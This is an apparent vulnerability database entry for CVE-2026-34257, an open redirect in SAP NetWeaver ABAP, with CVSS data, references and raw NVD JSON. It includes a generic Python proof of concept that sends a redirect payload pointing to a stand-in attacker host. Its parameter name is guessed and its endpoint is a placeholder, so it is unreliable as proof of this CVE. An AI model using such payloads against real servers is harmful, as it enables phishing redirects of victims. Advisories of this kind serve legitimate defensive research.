CVE-2026-34257

Description

Due to an Open Redirect vulnerability in SAP NetWeaver Application Server ABAP, an unauthenticated attacker could craft malicious URL that, if accessed by a victim, they could be redirected to the page controlled by the attacker. This causes low impact on confidentiality and integrity of the application with no impact on availability.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP NetWeaver Application Server ABAP (具体受影响版本请参考SAP Security Note 3692004)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2026-34257
import requests

def check_open_redirect(target_url):
    # Malicious domain controlled by attacker
    malicious_site = "http://attacker-example.com"
    
    # Payload attempting to trigger the redirect
    # Note: The specific parameter name (e.g., 'url', 'redirect', 'target') depends on the vulnerable endpoint
    payload = f"?redirect={malicious_site}"
    
    full_url = target_url + payload
    
    try:
        response = requests.get(full_url, allow_redirects=False, timeout=5)
        
        # Check for 301/302 status codes and if Location header points to the malicious site
        if response.status_code in [301, 302, 307, 308]:
            location = response.headers.get('Location', '')
            if malicious_site in location:
                print(f"[+] Vulnerability Confirmed!")
                print(f"    Target: {target_url}")
                print(f"    Redirecting to: {location}")
                return True
        
        print(f"[-] Not vulnerable or payload incorrect.")
        return False
        
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    # Replace with actual vulnerable endpoint
    target = "http://vulnerable-sap-server.com/sap/bc/webdynpro_abap/..."
    check_open_redirect(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34257
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34257
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34257/
[4] VulDB https://vuldb.com/cve/CVE-2026-34257
[5] https://me.sap.com/notes/3692004
[6] https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34257", "sourceIdentifier": "[email protected]", "published": "2026-04-14T01:16:03.730", "lastModified": "2026-04-17T15:18:16.507", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to an Open Redirect vulnerability in SAP NetWeaver Application Server ABAP, an unauthenticated attacker could craft malicious URL that, if accessed by a victim, they could be redirected to the page controlled by the attacker. This causes low impact on confidentiality and integrity of the application with no impact on availability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://me.sap.com/notes/3692004", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}